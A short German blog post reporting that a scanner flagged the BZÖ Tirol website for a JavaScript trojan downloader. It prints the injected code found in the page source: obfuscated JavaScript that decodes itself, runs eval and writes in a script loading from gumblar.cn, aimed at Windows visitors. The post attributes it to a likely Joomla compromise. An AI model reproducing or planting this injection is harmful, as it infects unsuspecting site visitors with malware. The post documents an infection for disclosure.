Was bekomme ich da gerade für einen nette E-Mail eines Virenscanners zugestellt…?!
Modul HTTP-Prufung – Alarm ausgelost auf Computer PCG1: http://www.bzoe-tirol.at/ enthalt JS/TrojanDownloader.Agent.NQB.gen Trojaner.
Da laust mich doch der Affe – ist das nicht trollig, die BZÖ Tirol hat sich einen Trojaner eingefangen bzw. nicht direkt eingefangen – viel mehr verteilt sie ihn mit ihrer Webseite…
Der Quellcode der Webseite offenbart dann auch das böse Teil:
function (xFCH)
{var mn5e=’var<20a<3d<22S<63<72<69p<74Engine<22<2cb<3d<22Ver<73<69on()+<22<2cj<3d<22<22<2cu<3d<6eavigato<72<2e<75s<65r<41gent<3b<69f<28(u<2e<69ndex<4ff(<22<57<69<6e<22<29<3e<30)<26<26<28<75<2ei<6ed<65xOf(<22NT<206<22)<3c0<29<26<26(<64ocument<2ecooki<65<2e<69n<64<65x<4ff<28<22miek<3d1<22<29<3c0)<26<26(ty<70e<6ff(zrvzts)<21<3dtypeo<66<28<22<41<22)<29)<7bzrvzts<3d<22A<22<3beval<28<22i<66(windo<77<2e<22+a+<22<29j<3dj<2b<22+a+<22Major<22+b+<61+<22Mi<6eo<72<22+b+a+<22Bu<69ld<22+<62+<22j<3b<22)<3bdo<63u<6den<74<2ewrit<65(<22<3cs<63ript<20src<3d<2f<2fgu<6dbl<61r<2e<63<6e<2frss<2f<3fi<64<3d<22+<6a+<22<3e<3c<5c<2fscript<3e<22<29<3b<7d';var hJ1pR=mn5e.replace(xFCH,'%');var R52=unescape(hJ1pR);eval(R52)}
);
Und schon ist’s geschehen um Surfer mit Windows und ohne Virenscanner…
Das ganze ist wohl eine Joomla 1.5 Webseite – entweder ungepatcht oder es gibt mal wieder eine neue Lücke im Joomla die sich noch nicht so recht rumgesprochen hat!
So wie es aussieht findet man im Web unter Gumblar/Martuz ähnliches.